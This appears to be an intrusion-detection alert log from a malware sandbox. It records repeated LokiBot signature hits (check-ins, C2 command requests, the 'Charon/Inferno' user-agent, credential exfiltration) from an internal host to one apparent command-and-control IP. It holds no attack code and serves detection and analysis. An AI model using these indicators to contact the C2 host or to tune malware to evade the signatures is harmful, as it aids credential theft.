Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:47.378472
SID:	2024318
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:53.470085
SID:	2024318
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:51.123133
SID:	2021641
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:41.115114
SID:	2025381
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:00.769505
SID:	2025381
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:04.659572
SID:	2024318
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:47.378472
SID:	2024313
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:06.999341
SID:	2024313
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:10.531874
SID:	2825766
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:55.812911
SID:	2024313
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:12.096911
SID:	2825766
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:02.046578
SID:	2025381
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:10.846749
SID:	2024318
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:11.314149
SID:	2024318
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:10.846749
SID:	2024313
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:31.907019
SID:	2825766
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:43.503603
SID:	2024318
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:48.181654
SID:	2024318
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:36.516498
SID:	2025381
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:31.298967
SID:	2021641
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:48.181654
SID:	2024313
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:27.109787
SID:	2021641
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:05.891670
SID:	2021641
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:38.088060
SID:	2021641
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:03.119856
SID:	2021641
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:11.314149
SID:	2024313
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:24.839758
SID:	2825766
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:54.259588
SID:	2825766
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:15.972978
SID:	2825766
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:43.503603
SID:	2024313
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:05.441892
SID:	2825766
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:15.205072
SID:	2024313
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:17.112021
SID:	2025381
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:04.359604
SID:	2025381
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:12.357168
SID:	2021641
Source Port:	49858
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:14.663983
SID:	2025381
Source Port:	49861
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:15.205072
SID:	2024318
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:13.897343
SID:	2825766
Source Port:	49860
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:48.178974
SID:	2825766
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:24.137227
SID:	2024317
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:31.133120
SID:	2024318
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:44.269499
SID:	2825766
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:28.779878
SID:	2024318
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:24.137227
SID:	2024312
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:13.117986
SID:	2025381
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:35.705322
SID:	2825766
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:31.133120
SID:	2024313
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:26.328739
SID:	2024318
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:36.488685
SID:	2825766
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:28.779878
SID:	2024313
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:08.980641
SID:	2025381
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:15.972978
SID:	2021641
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:26.424765
SID:	2021641
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:26.328739
SID:	2024313
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:25.641172
SID:	2024318
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:14.423119
SID:	2025381
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:38.036927
SID:	2825766
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:19.440133
SID:	2025381
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:51.314444
SID:	2825766
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:25.641172
SID:	2024313
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:03.891737
SID:	2025381
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:13.897343
SID:	2021641
Source Port:	49860
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:18.674487
SID:	2825766
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:27.906071
SID:	2025381
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:09.757970
SID:	2024313
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:29.547586
SID:	2825766
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:03.603579
SID:	2021641
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:30.339047
SID:	2025381
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:24.825007
SID:	2024313
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:39.686953
SID:	2024318
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:50.516269
SID:	2024318
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:52.706701
SID:	2025381
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:54.259588
SID:	2021641
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:09.757970
SID:	2024318
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:24.839758
SID:	2021641
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:50.516269
SID:	2024313
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:55.812911
SID:	2024318
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:07.768549
SID:	2825766
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:27.109787
SID:	2825766
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:57.360186
SID:	2025381
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:39.686953
SID:	2024313
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:06.999341
SID:	2024318
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:56.595283
SID:	2825766
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:18.674487
SID:	2021641
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:34.204192
SID:	2825766
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:59.991734
SID:	2021641
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:02.332845
SID:	2024313
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:40.344957
SID:	2021641
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:49.735329
SID:	2025381
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:10.080334
SID:	2825766
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:55.035047
SID:	2825766
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:39.580792
SID:	2825766
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:20.206304
SID:	2024318
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:34.079276
SID:	2025381
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:03.119856
SID:	2025381
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:47.361321
SID:	2025381
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:02.332845
SID:	2024318
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:58.128553
SID:	2024318
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:58.128553
SID:	2024313
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:45.799677
SID:	2025381
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:27.109787
SID:	2024313
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:12.861151
SID:	2024313
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:13.117986
SID:	2024313
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:53.470085
SID:	2021641
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:08.980641
SID:	2021641
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:35.733011
SID:	2025381
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:13.117986
SID:	2024318
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:27.109787
SID:	2024318
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:55.220105
SID:	2825766
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:19.370644
SID:	2825766
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:02.814837
SID:	2825766
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:22.429106
SID:	2024313
Source Port:	49869
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:01.279270
SID:	2021641
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:12.861151
SID:	2024318
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:39.686953
SID:	2825766
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

